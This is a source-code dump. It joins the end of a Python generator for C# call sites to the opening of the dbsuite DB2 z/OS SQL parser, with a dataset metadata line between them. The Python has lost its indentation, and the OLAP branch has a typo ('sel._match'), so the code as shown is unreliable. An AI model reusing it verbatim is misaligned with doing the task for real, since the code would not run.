return %(consumedCount)d;
}
}
public override int Run(InterpretedFrame frame) {
%(argfetch)s
var target = frame.Pop();
frame.Push(_site.Target(_site, (CodeContext)frame.Pop(), %(callargs)s));
return +1;
}
}""" % {'siteargs': siteargs, 'argfetch' : argfetch, 'callargs' : callargs, 'argcount' : i, 'consumedCount' : i + 2 })
def gen_shared_call_sites_storage(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
siteargs = 'object, ' * (i + 1)
cw.writeline('private CallSite<Func<CallSite, CodeContext, %sobject>> _callSite%d;' % (siteargs, i))
def gen_shared_call_sites_properties(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
siteargs = 'object, ' * (i + 1)
cw.enter_block('internal CallSite<Func<CallSite, CodeContext, %sobject>> CallSite%d' % (siteargs, i))
cw.enter_block('get')
cw.writeline('EnsureCall%dSite();' % i)
cw.writeline('return _callSite%d;' % i)
cw.exit_block()
cw.exit_block()
cw.writeline('')
cw.enter_block('private void EnsureCall%dSite()' % i)
cw.enter_block('if (_callSite%d == null)' % i)
cw.writeline('Interlocked.CompareExchange(')
cw.indent()
cw.writeline('ref _callSite%d,' % i)
cw.writeline('CallSite<Func<CallSite, CodeContext, %sobject>>.Create(Invoke(new CallSignature(%d))),' % (siteargs, i))
cw.writeline('null')
cw.dedent()
cw.writeline(');')
cw.exit_block()
cw.exit_block()
cw.writeline('')
def main():
return generate(
("Python Selfless Method Caller Switch", selfless_method_caller_switch),
("Python Method Callers", method_callers),
("Python Shared Call Sites Properties", gen_shared_call_sites_properties),
("Python Shared Call Sites Storage", gen_shared_call_sites_storage),
("Python Call Expression Instructions", gen_call_expression_instructions),
("Python Call Expression Instruction Switch", gen_call_expression_instruction_switch),
("Python Fast Init Max Args", gen_fast_init_max_args),
("Python Fast Init Switch", gen_fast_init_switch),
("Python Fast Init Callers", gen_fast_init_callers),
("Python Fast Type Caller Switch", gen_fast_type_caller_switch),
("Python Fast Type Callers", gen_fast_type_callers),
("Python Recursion Enforcement", gen_recursion_checks),
("Python Recursion Delegate Switch", gen_recursion_delegate_switch),
("Python Lazy Call Targets", gen_lazy_call_targets),
("Python Zero Arg Function Callers", function_callers_0),
("Python Function Callers", function_callers),
("Python Function Caller Switch", function_caller_switch),
("Python Call Target Switch", gen_python_switch),
)
if __name__ == "__main__":
main()
| apache-2.0 | 6,270,476,123,638,950,000 | 42.056013 | 201 | 0.601033 | false |
waveform80/dbsuite | dbsuite/plugins/db2/zos/parser.py | 1 | 412770 | # vim: set et sw=4 sts=4:
# Copyright 2012 Dave Hughes.
#
# This file is part of dbsuite.
#
# dbsuite is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# dbsuite is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# dbsuite. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
from collections import namedtuple
from dbsuite.plugins.db2.zos.tokenizer import db2zos_namechars, db2zos_identchars
from dbsuite.parser import BaseParser, ParseError, ParseBacktrack, quote_str
from dbsuite.tokenizer import TokenTypes as TT, Token
# Standard size suffixes and multipliers
SUFFIX_KMG = {
'K': 1024**1,
'M': 1024**2,
'G': 1024**3,
}
# Default sizes for certain datatypes
CHAR_DEFAULT_SIZE = 1
BLOB_DEFAULT_SIZE = 1024*1024
DECIMAL_DEFAULT_SIZE = 5
DECIMAL_DEFAULT_SCALE = 0
DECFLOAT_DEFAULT_SIZE = 34
TIMESTAMP_DEFAULT_SIZE = 6
class DB2ZOSParser(BaseParser):
"""Reformatter which breaks up and re-indents DB2 for LUW's SQL dialect.
This class is, at its core, a full blown SQL language parser that
understands many common SQL DML and DDL commands (from the basic ones like
INSERT, UPDATE, DELETE, SELECT, to the more DB2 specific ones such as
CREATE TABLESPACE, CREATE FUNCTION, and dynamic compound statements).
"""
def __init__(self):
super(DB2ZOSParser, self).__init__()
self.namechars = db2zos_namechars
self.identchars = db2zos_identchars
self.current_schema = None
def _parse_init(self, tokens):
super(DB2ZOSParser, self)._parse_init(tokens)
self.current_schema = None
def _save_state(self):
# Override _save_state to save the current schema
self._states.append((
self._index,
self._level,
len(self._output),
self.current_schema
))
def _restore_state(self):
# Override _restore_state to restore the current schema
(
self._index,
self._level,
output_len,
self.current_schema
) = self._states.pop()
del self._output[output_len:]
def _parse_top(self):
# Override _parse_top to make a 'statement' the top of the parse tree
self._parse_statement()
def _prespace_default(self, template):
# Overridden to include array and set operators, and the specific
# intra-statement terminator used by func/proc definitions
return super(DB2ZOSParser, self)._prespace_default(template) and template not in (
']', '}', ';',
(TT.OPERATOR, ']'),
(TT.OPERATOR, '}'),
(TT.TERMINATOR, ';'),
)
def _postspace_default(self, template):
# Overridden to include array and set operators
return super(DB2ZOSParser, self)._postspace_default(template) and template not in (
'[', '{',
(TT.OPERATOR, '['),
(TT.OPERATOR, '{'),
)
# PATTERNS ###############################################################
def _parse_subrelation_name(self):
"""Parses the (possibly qualified) name of a relation-owned object.
A relation-owned object is either a column or a constraint. This method
parses such a name with up to two optional qualifiers (e.g., it is
possible in a SELECT statement with no table correlation clauses to
specify SCHEMA.TABLE.COLUMN). The method returns the parsed name as a
tuple with 3 elements (None is used for qualifiers which are missing).
"""
token1 = self._expect(TT.IDENTIFIER)
result = (None, None, token1.value)
if self._match('.'):
self._update_output(Token(TT.RELATION, token1.value, token1.source, token1.line, token1.column), -2)
token2 = self._expect(TT.IDENTIFIER)
result = (None, result[2], token2.value)
if self._match('.'):
self._update_output(Token(TT.SCHEMA, token1.value, token1.source, token1.line, token1.column), -4)
self._update_output(Token(TT.RELATION, token2.value, token2.source, token2.line, token2.column), -2)
token3 = self._expect(TT.IDENTIFIER)
result = (result[1], result[2], token3.value)
return result
_parse_column_name = _parse_subrelation_name
_parse_constraint_name = _parse_subrelation_name
# These are cheats; remote object names consist of server.schema.object
# instead of schema.relation.object, and source object names consist of
# schema.package.object, but they'll do
_parse_remote_object_name = _parse_subrelation_name
_parse_source_object_name = _parse_subrelation_name
# These are also cheats; routine, type and variables names as of 9.7 are
# either [schema.]routine (1 or 2-part) or schema.module.routine (3-part)
_parse_function_name = _parse_subrelation_name
_parse_procedure_name = _parse_subrelation_name
_parse_method_name = _parse_subrelation_name
_parse_type_name = _parse_subrelation_name
_parse_variable_name = _parse_subrelation_name
def _parse_subschema_name(self):
"""Parses the (possibly qualified) name of a schema-owned object.
A schema-owned object is a table, view, index, function, sequence, etc.
This method parses such a name with an optional qualifier (the schema
name). The method returns the parsed name as a tuple with 2 elements
(None is used for the schema qualifier if it is missing).
"""
token1 = self._expect(TT.RELATION)
result = (None, token1.value)
if self._match('.'):
self._update_output(Token(TT.SCHEMA, token1.value, token1.source, token1.line, token1.column), -2)
token2 = self._expect(TT.RELATION)
result = (result[1], token2.value)
return result
_parse_relation_name = _parse_subschema_name
_parse_table_name = _parse_subschema_name
_parse_view_name = _parse_subschema_name
_parse_alias_name = _parse_subschema_name
_parse_nickname_name = _parse_subschema_name
_parse_trigger_name = _parse_subschema_name
_parse_index_name = _parse_subschema_name
_parse_routine_name = _parse_subschema_name
_parse_module_name = _parse_subschema_name
_parse_sequence_name = _parse_subschema_name
# Another cheat; security labels exist within a security policy
_parse_security_label_name = _parse_subschema_name
def _parse_size(self, optional=False, suffix={}):
"""Parses a parenthesized size with an optional scale suffix.
This method parses a parenthesized integer number. The optional
parameter controls whether an exception is raised if an opening
parenthesis is not encountered at the current input position. The
suffix parameter is a dictionary mapping suffix->multiplier. The global
constant SUFFIX_KMG defines a commonly used suffix mapping (K->1024,
M->1024**2, etc.)
"""
if optional:
if not self._match('(', prespace=False):
return None
else:
self._expect('(', prespace=False)
size = self._expect(TT.NUMBER)[1]
if suffix:
suf = self._match_one_of(suffix.keys())
if suf:
size *= suffix[suf[1]]
self._expect(')')
return size
def _parse_special_register(self):
"""Parses a special register (e.g. CURRENT_DATE)"""
if self._match((TT.REGISTER, 'CURRENT')):
if self._match((TT.REGISTER, 'TIMESTAMP')):
if self._match('('):
self._expect_sequence([TT.INTEGER, ')'])
elif self._match_one_of([
(TT.REGISTER, 'CLIENT_ACCTNG'),
(TT.REGISTER, 'CLIENT_APPLNAME'),
(TT.REGISTER, 'CLIENT_USERID'),
(TT.REGISTER, 'CLIENT_WRKSTNNAME'),
(TT.REGISTER, 'DATE'),
(TT.REGISTER, 'DBPARTITIONNUM'),
(TT.REGISTER, 'DEGREE'),
(TT.REGISTER, 'ISOLATION'),
(TT.REGISTER, 'NODE'),
(TT.REGISTER, 'PATH'),
(TT.REGISTER, 'SCHEMA'),
(TT.REGISTER, 'SERVER'),
(TT.REGISTER, 'SQLID'),
(TT.REGISTER, 'TIME'),
(TT.REGISTER, 'TIMEZONE'),
(TT.REGISTER, 'USER'),
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'DECFLOAT'),
(TT.REGISTER, 'ROUNDING'),
(TT.REGISTER, 'MODE')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'DEFAULT'),
(TT.REGISTER, 'TRANSFORM'),
(TT.REGISTER, 'GROUP')
]):
pass
elif self._match((TT.REGISTER, 'EXPLAIN')):
self._expect_one_of([
(TT.REGISTER, 'MODE'),
(TT.REGISTER, 'SNAPSHOT')
])
elif self._match_sequence([
(TT.REGISTER, 'FEDERATED'),
(TT.REGISTER, 'ASYNCHRONY')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'IMPLICIT'),
(TT.REGISTER, 'XMLPARSE'),
(TT.REGISTER, 'OPTION')]
):
pass
elif self._match_sequence([
(TT.REGISTER, 'LOCALE'),
(TT.REGISTER, 'LC_MESSAGES')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'LOCALE'),
(TT.REGISTER, 'LC_TIME')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'LOCK'),
(TT.REGISTER, 'TIMEOUT')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'MAINTAINED'),
(TT.REGISTER, 'TABLE'),
(TT.REGISTER, 'TYPES'),
(TT.REGISTER, 'FOR'),
(TT.REGISTER, 'OPTIMIZATION')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'MDC'),
(TT.REGISTER, 'ROLLOUT'),
(TT.REGISTER, 'MODE')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'OPTIMIZATION'),
(TT.REGISTER, 'PROFILE')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'PACKAGE'),
(TT.REGISTER, 'PATH')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'QUERY'),
(TT.REGISTER, 'OPTIMIZATION')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'REFRESH'),
(TT.REGISTER, 'AGE')
]):
pass
else:
self._expected((TT.REGISTER,))
elif self._match((TT.REGISTER, 'CLIENT')):
self._expect_one_of([
(TT.REGISTER, 'ACCTNG'),
(TT.REGISTER, 'APPLNAME'),
(TT.REGISTER, 'USERID'),
(TT.REGISTER, 'WRKSTNNAME'),
])
elif self._match((TT.REGISTER, 'CURRENT_TIMESTAMP')):
if self._match('('):
self._expect_sequence([TT.INTEGER, ')'])
else:
self._expect_one_of([
(TT.REGISTER, 'CURRENT_DATE'),
(TT.REGISTER, 'CURRENT_PATH'),
(TT.REGISTER, 'CURRENT_SCHEMA'),
(TT.REGISTER, 'CURRENT_SERVER'),
(TT.REGISTER, 'CURRENT_TIME'),
(TT.REGISTER, 'CURRENT_TIMEZONE'),
(TT.REGISTER, 'CURRENT_USER'),
(TT.REGISTER, 'SESSION_USER'),
(TT.REGISTER, 'SYSTEM_USER'),
(TT.REGISTER, 'USER'),
])
def _parse_datatype(self):
"""Parses a (possibly qualified) data type with optional arguments.
Parses a data type name with an optional qualifier (the schema name).
The method returns a tuple with the following structure:
(schema_name, type_name, size, scale)
If the type has no parameters size and/or scale may be None. If the
schema is not specified, schema_name is None, unless the type is a
builtin type in which case the schema_name will always be 'SYSIBM'
regardless of whether a schema was specified with the type in the
source.
"""
self._save_state()
try:
# Try and parse a built-in type
typeschema = 'SYSIBM'
size = None
scale = None
# Match the optional SYSIBM prefix
if self._match((TT.DATATYPE, 'SYSIBM')):
self._expect('.')
if self._match((TT.DATATYPE, 'SMALLINT')):
typename = 'SMALLINT'
elif self._match_one_of([(TT.DATATYPE, 'INT'), (TT.DATATYPE, 'INTEGER')]):
typename = 'INTEGER'
elif self._match((TT.DATATYPE, 'BIGINT')):
typename = 'BIGINT'
elif self._match((TT.DATATYPE, 'FLOAT')):
size = self._parse_size(optional=True)
if size is None or size > 24:
typename = 'DOUBLE'
else:
typename = 'REAL'
elif self._match((TT.DATATYPE, 'REAL')):
typename = 'REAL'
elif self._match((TT.DATATYPE, 'DOUBLE')):
self._match((TT.DATATYPE, 'PRECISION'))
typename = 'DOUBLE'
elif self._match((TT.DATATYPE, 'DECFLOAT')):
typename = 'DECFLOAT'
self._parse_size(optional=True) or DECFLOAT_DEFAULT_SIZE
elif self._match_one_of([(TT.DATATYPE, 'DEC'), (TT.DATATYPE, 'DECIMAL')]):
typename = 'DECIMAL'
size = DECIMAL_DEFAULT_SIZE
scale = DECIMAL_DEFAULT_SCALE
if self._match('(', prespace=False):
size = self._expect(TT.NUMBER).value
if self._match(','):
scale = self._expect(TT.NUMBER).value
self._expect(')')
elif self._match_one_of([(TT.DATATYPE, 'NUM'), (TT.DATATYPE, 'NUMERIC')]):
typename = 'NUMERIC'
size = DECIMAL_DEFAULT_SIZE
scale = DECIMAL_DEFAULT_SCALE
if self._match('(', prespace=False):
size = self._expect(TT.NUMBER).value
if self._match(','):
scale = self._expect(TT.NUMBER).value
self._expect(')')
elif self._match_one_of([(TT.DATATYPE, 'CHAR'), (TT.DATATYPE, 'CHARACTER')]):
if self._match((TT.DATATYPE, 'VARYING')):
typename = 'VARCHAR'
size = self._parse_size(optional=False, suffix=SUFFIX_KMG)
self._match_sequence(['FOR', 'BIT', 'DATA'])
elif self._match_sequence([(TT.DATATYPE, 'LARGE'), (TT.DATATYPE, 'OBJECT')]):
typename = 'CLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
else:
typename = 'CHAR'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or CHAR_DEFAULT_SIZE
self._match_sequence(['FOR', 'BIT', 'DATA'])
elif self._match((TT.DATATYPE, 'VARCHAR')):
typename = 'VARCHAR'
size = self._parse_size(optional=False, suffix=SUFFIX_KMG)
self._match_sequence(['FOR', 'BIT', 'DATA'])
elif self._match((TT.DATATYPE, 'VARGRAPHIC')):
typename = 'VARGRAPHIC'
size = self._parse_size(optional=False)
elif self._match_sequence([(TT.DATATYPE, 'LONG'), (TT.DATATYPE, 'VARCHAR')]):
typename = 'LONG VARCHAR'
elif self._match_sequence([(TT.DATATYPE, 'LONG'), (TT.DATATYPE, 'VARGRAPHIC')]):
typename = 'LONG VARGRAPHIC'
elif self._match((TT.DATATYPE, 'CLOB')):
typename = 'CLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'BLOB')):
typename = 'BLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match_sequence([(TT.DATATYPE, 'BINARY'), (TT.DATATYPE, 'LARGE'), (TT.DATATYPE, 'OBJECT')]):
typename = 'BLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'DBCLOB')):
typename = 'DBCLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'GRAPHIC')):
typename = 'GRAPHIC'
size = self._parse_size(optional=True) or CHAR_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'NCHAR')):
typename = 'NCHAR'
if self._match((TT.DATATYPE, 'VARYING')):
typename = 'NVARCHAR'
size = self._parse_size(optional=False)
else:
typename = 'NCHAR'
size = self._parse_size(optional=True) or CHAR_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'NATIONAL')):
self._expect_one_of([(TT.DATATYPE, 'CHAR'), (TT.DATATYPE, 'CHARACTER')])
if self._match((TT.DATATYPE, 'VARYING')):
typename = 'NVARCHAR'
size = self._parse_size(optional=False)
else:
typename = 'NCHAR'
size = self._parse_size(optional=True) or CHAR_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'DATE')):
typename = 'DATE'
elif self._match((TT.DATATYPE, 'TIME')):
typename = 'TIME'
elif self._match((TT.DATATYPE, 'TIMESTAMP')):
typename = 'TIMESTAMP'
size = self._parse_size(optional=True) or TIMESTAMP_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'DATALINK')):
typename = 'DATALINK'
size = self._parse_size(optional=True)
elif self._match((TT.DATATYPE, 'XML')):
typename = 'XML'
elif self._match((TT.DATATYPE, 'DB2SECURITYLABEL')):
typeschema = 'SYSPROC'
typename = 'DB2SECURITYLABEL'
elif self._match((TT.DATATYPE, 'BOOLEAN')):
typename = 'BOOLEAN'
elif self._match((TT.DATATYPE, 'CURSOR')):
typename = 'CURSOR'
elif self._match((TT.DATATYPE, 'ARRAY')):
typename = 'ARRAY'
size = self._parse_size(optional=False, suffix=SUFFIX_KMG)
else:
raise ParseBacktrack()
except ParseError:
# If that fails, rewind and parse a user-defined type (user defined
# types do not have a size or scale)
self._restore_state()
typeschema = None
typename = self._expect(TT.DATATYPE).value
if self._match('.'):
typeschema = typename
typename = self._expect(TT.DATATYPE).value
size = None
scale = None
else:
self._forget_state()
return (typeschema, typename, size, scale)
def _parse_ident_list(self, newlines=False):
"""Parses a comma separated list of identifiers.
This is a common pattern in SQL, for example within parentheses on the
left hand side of an assignment in an UPDATE statement, or the INCLUDE
list of a CREATE UNIQUE INDEX statement.
The method returns a list of the identifiers seen (primarily useful for
counting the number of identifiers seen, but has other uses too).
"""
result = []
while True:
ident = self._expect(TT.IDENTIFIER).value
# Parse an optional array element suffix
if self._match('[', prespace=False):
self._parse_expression()
self._expect(']')
result.append(ident)
if not self._match(','):
break
elif newlines:
self._newline()
return result
def _parse_expression_list(self, allowdefault=False, newlines=False):
"""Parses a comma separated list of expressions.
This is a common pattern in SQL, for example the parameter list of
a function, the arguments of an ORDER BY clause, etc. The allowdefault
parameter indicates whether DEFAULT can appear in the list instead
of an expression (useful when parsing the VALUES clause of an INSERT
statement for example).
"""
while True:
if not (allowdefault and self._match('DEFAULT')):
self._parse_expression()
if not self._match(','):
break
elif newlines:
self._newline()
def _parse_datatype_list(self, newlines=False):
"""Parses a comma separated list of data-types.
This is another common pattern in SQL, found when trying to define
the prototype of a function or procedure without using the specific
name (and a few other places).
"""
while True:
self._parse_datatype()
if not self._match(','):
break
elif newlines:
self._newline()
def _parse_ident_type_list(self, newlines=False):
"""Parses a comma separated list of identifiers and data-types.
This is a common pattern in SQL, found in the prototype of SQL
functions, the INCLUDE portion of a SELECT-FROM-DML statement, etc.
"""
while True:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
if not self._match(','):
break
elif newlines:
self._newline()
def _parse_tuple(self, allowdefault=False):
"""Parses a full-select or a tuple (list) of expressions.
This is a common pattern found in SQL, for example on the right hand
side of the IN operator, in an UPDATE statement on the right hand side
of a parenthesized column list, etc. The easiest way to implement
this is by saving the current parser state, attempting to parse a
full-select, rewinding the state if this fails and parsing a tuple
of expressions.
The allowdefault parameter is propogated to parse_expression_list. See
parse_expression_list for more detail.
"""
# Opening parenthesis already matched
if self._peek_one_of(['SELECT', 'VALUES']):
# Parse a full-select
self._indent()
self._parse_full_select()
self._outdent()
else:
# Everything else (including a redundantly parenthesized
# full-select) can be parsed as an expression list
self._parse_expression_list(allowdefault)
# EXPRESSIONS and PREDICATES #############################################
def _parse_search_condition(self, newlines=True):
"""Parse a search condition (as part of WHERE/HAVING/etc.)"""
while True:
self._match('NOT')
# Ambiguity: open parentheses could indicate a parentheiszed search
# condition, or a parenthesized expression within a predicate
self._save_state()
try:
# Attempt to parse a parenthesized search condition
self._expect('(')
self._parse_search_condition(newlines)
self._expect(')')
except ParseError:
# If that fails, rewind and parse a predicate instead (which
# will parse a parenthesized expression)
self._restore_state()
self._parse_predicate()
if self._match('SELECTIVITY'):
self._expect(TT.NUMBER)
else:
self._forget_state()
if self._match_one_of(['AND', 'OR']):
if newlines:
self._newline(-1)
else:
break
def _parse_predicate(self):
"""Parse high precedence predicate operators (BETWEEN, IN, etc.)"""
if self._match('EXISTS'):
self._expect('(')
self._parse_full_select()
self._expect(')')
else:
self._parse_expression()
if self._match('NOT'):
if self._match('LIKE'):
self._parse_expression()
if self._match('ESCAPE'):
self._parse_expression()
elif self._match('BETWEEN'):
self._parse_expression()
self._expect('AND')
self._parse_expression()
elif self._match('IN'):
if self._match('('):
self._parse_tuple()
self._expect(')')
else:
self._parse_expression()
else:
self._expected_one_of(['LIKE', 'BETWEEN', 'IN'])
elif self._match('LIKE'):
self._parse_expression()
if self._match('ESCAPE'):
self._parse_expression()
elif self._match('BETWEEN'):
self._parse_expression()
self._expect('AND')
self._parse_expression()
elif self._match('IN'):
if self._match('('):
self._parse_tuple()
self._expect(')')
else:
self._parse_expression()
elif self._match('IS'):
self._match('NOT')
if self._match('VALIDATED'):
if self._match('ACCORDING'):
self._expect_sequence(['TO', 'XMLSCHEMA'])
if self._match('IN'):
self._expect('(')
while True:
self._parse_xml_schema_identification()
if not self._match(','):
break
self._expect(')')
else:
self._parse_xml_schema_identification()
else:
self._expect_one_of(['NULL', 'VALIDATED'])
elif self._match('XMLEXISTS'):
self._expect('(')
self._expect(TT.STRING)
if self._match('PASSING'):
self._match_sequence(['BY', 'REF'])
while True:
self._parse_expression()
self._expect_sequence(['AS', TT.IDENTIFIER])
self._match_sequence(['BY', 'REF'])
if not self._match(','):
break
self._expect(')')
elif self._match_one_of(['=', '<', '>', '<>', '<=', '>=']):
if self._match_one_of(['SOME', 'ANY', 'ALL']):
self._expect('(')
self._parse_full_select()
self._expect(')')
else:
self._parse_expression()
else:
self._expected_one_of([
'EXISTS',
'NOT',
'LIKE',
'BETWEEN',
'IS',
'IN',
'=',
'<',
'>',
'<>',
'<=',
'>='
])
def _parse_duration_label(self, optional=False):
labels = (
'YEARS',
'YEAR',
'DAYS',
'DAY',
'MONTHS',
'MONTH',
'HOURS',
'HOUR',
'MINUTES',
'MINUTE',
'SECONDS',
'SECOND',
'MICROSECONDS',
'MICROSECOND',
)
if optional:
self._match_one_of(labels)
else:
self._expect_one_of(labels)
def _parse_expression(self):
while True:
self._match_one_of(['+', '-'], postspace=False) # Unary +/-
if self._match('('):
self._parse_tuple()
self._expect(')')
elif self._match('CAST'):
self._parse_cast_expression()
elif self._match('XMLCAST'):
self._parse_cast_expression()
elif self._match('CASE'):
if self._match('WHEN'):
self._parse_searched_case()
else:
self._parse_simple_case()
elif self._match_sequence(['NEXT', 'VALUE', 'FOR']) or self._match_sequence(['NEXTVAL', 'FOR']):
self._parse_sequence_name()
elif self._match_sequence(['PREVIOUS', 'VALUE', 'FOR']) or self._match_sequence(['PREVVAL', 'FOR']):
self._parse_sequence_name()
elif self._match_sequence(['ROW', 'CHANGE']):
self._expect_one_of(['TOKEN', 'TIMESTAMP'])
self._expect('FOR')
self._parse_table_name()
elif self._match_one_of([TT.NUMBER, TT.STRING, TT.PARAMETER, 'NULL']): # Literals
pass
else:
# Ambiguity: an identifier could be a register, a function
# call, a column name, etc.
self._save_state()
try:
self._parse_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_special_register()
except ParseError:
self._restore_state()
self._parse_column_name()
else:
self._forget_state()
else:
self._forget_state()
# Parse an optional array element suffix
if self._match('[', prespace=False):
self._parse_expression()
self._expect(']')
# Parse an optional interval suffix
self._parse_duration_label(optional=True)
if not self._match_one_of(['+', '-', '*', '/', '||', 'CONCAT']): # Binary operators
break
def _parse_function_call(self):
"""Parses a function call of various types"""
# Ambiguity: certain functions have "abnormal" internal syntaxes (extra
# keywords, etc). The _parse_scalar_function_call method is used to
# handle all "normal" syntaxes. Special methods are tried first for
# everything else
self._save_state()
try:
self._parse_aggregate_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_olap_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_xml_function_call()
except ParseError:
self._restore_state()
self._save_state()
try:
self._parse_sql_function_call()
except ParseError:
self._restore_state()
self._parse_scalar_function_call()
else:
self._forget_state()
else:
self._forget_state()
else:
self._forget_state()
else:
self._forget_state()
def _parse_aggregate_function_call(self):
"""Parses an aggregate function with it's optional arg-prefix"""
# Parse the optional SYSIBM schema prefix
if self._match('SYSIBM'):
self._expect('.')
# Although CORRELATION and GROUPING are aggregate functions they're not
# included here as their syntax is entirely compatible with "ordinary"
# functions so _parse_scalar_function_call will handle them
aggfunc = self._expect_one_of([
'ARRAY_AGG',
'COUNT',
'COUNT_BIG',
'AVG',
'MAX',
'MIN',
'STDDEV',
'SUM',
'VARIANCE',
'VAR',
]).value
self._expect('(', prespace=False)
if aggfunc in ('COUNT', 'COUNT_BIG') and self._match('*'):
# COUNT and COUNT_BIG can take '*' as a sole parameter
pass
elif aggfunc == 'ARRAY_AGG':
self._parse_expression()
if self._match_sequence(['ORDER', 'BY']):
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
else:
# The aggregation functions handled by this method have an optional
# ALL/DISTINCT argument prefix
self._match_one_of(['ALL', 'DISTINCT'])
# And only take a single expression as an argument
self._parse_expression()
self._expect(')')
# Parse an OLAP suffix if one exists
if self._match('OVER'):
self._parse_olap_window_clause()
def _parse_olap_function_call(self):
"""Parses an OLAP function call (some of which have non-standard internal syntax)"""
if self._match('SYSIBM'):
self._expect('.')
olapfunc = self._expect_one_of([
'ROW_NUMBER',
'RANK',
'DENSE_RANK',
'LAG',
'LEAD',
'FIRST_VALUE',
'LAST_VALUE',
]).value
self._expect('(', prespace=False)
if olapfunc in ('LAG', 'LEAD'):
self._parse_expression()
if self._match(','):
self._expect(TT.NUMBER)
if sel._match(','):
self._parse_expression()
if self._match(','):
self._expect_one_of([(TT.STRING, 'RESPECT NULLS'), (TT.STRING, 'IGNORE NULLS')])
elif olapfunc in ('FIRST_VALUE', 'LAST_VALUE'):
self._parse_expression()
if self._match(','):
self._expect_one_of([(TT.STRING, 'RESPECT NULLS'), (TT.STRING, 'IGNORE NULLS')])
self._expect(')')
self._expect('OVER')
self._parse_olap_window_clause()
def _parse_xml_function_call(self):
"""Parses an XML function call (which has non-standard internal syntax)"""
# Parse the optional SYSIBM schema prefix
if self._match('SYSIBM'):
self._expect('.')
# Note that XML2CLOB (compatibility), XMLCOMMENT, XMLCONCAT,
# XMLDOCUMENT, XMLTEXT, and XMLXSROBJECTID aren't handled by this
# method as their syntax is "normal" so _parse_scalar_function_call
# will handle them
xmlfunc = self._expect_one_of([
'XMLAGG',
'XMLATTRIBUTES',
'XMLELEMENT',
'XMLFOREST',
'XMLGROUP',
'XMLNAMESPACES',
'XMLPARSE',
'XMLPI',
'XMLQUERY',
'XMLROW',
'XMLSERIALIZE',
'XMLVALIDATE',
'XMLTABLE',
'XMLTRANSFORM',
]).value
self._expect('(', prespace=False)
if xmlfunc == 'XMLAGG':
self._parse_expression()
if self._match_sequence(['ORDER', 'BY']):
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
elif xmlfunc == 'XMLATTRIBUTES':
while True:
self._parse_expression()
if self._match('AS'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
elif xmlfunc == 'XMLELEMENT':
self._expect('NAME')
self._expect(TT.IDENTIFIER)
if self._match(','):
# XXX We're not specifically checking for namespaces and
# attributes calls as we should here (although expression_list
# will parse them just fine)
self._parse_expression_list()
if self._match('OPTION'):
self._parse_xml_value_option()
elif xmlfunc == 'XMLFOREST':
while True:
# XXX We're not specifically checking for a namespaces call as
# we should here (although expression will parse it just fine)
self._parse_expression()
self._match_sequence(['AS', TT.IDENTIFIER])
if not self._match(','):
break
if self._match('OPTION'):
self._parse_xml_value_option()
elif xmlfunc == 'XMLGROUP':
while True:
self._parse_expression()
if self._match('AS'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
if self._match_sequence(['ORDER', 'BY']):
while True:
self._parse_expression()
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
if self._match('OPTION'):
self._parse_xml_row_option(allowroot=True)
elif xmlfunc == 'XMLNAMESPACES':
while True:
if self._match('DEFAULT'):
self._expect(TT.STRING)
elif self._match('NO'):
self._expect_sequence(['DEFAULT', TT.STRING])
else:
self._expect_sequence([TT.STRING, 'AS', TT.IDENTIFIER])
if not self._match(','):
break
elif xmlfunc == 'XMLPARSE':
self._expect_sequence(['DOCUMENT', TT.STRING])
if self._match_one_of(['STRIP', 'PRESERVE']):
self._expect('WHITESPACE')
elif xmlfunc == 'XMLPI':
self._expect_sequence(['NAME', TT.IDENTIFIER])
if self._match(','):
self._expect(TT.STRING)
elif xmlfunc == 'XMLQUERY':
self._expect(TT.STRING)
if self._match('PASSING'):
self._match_sequence(['BY', 'REF'])
while True:
self._parse_expression()
self._expect_sequence(['AS', TT.IDENTIFIER])
self._match_sequence(['BY', 'REF'])
if not self._match(','):
break
if self._match('RETURNING'):
self._expect('SEQUENCE')
self._match_sequence(['BY', 'REF'])
self._match_sequence(['EMPTY', 'ON', 'EMPTY'])
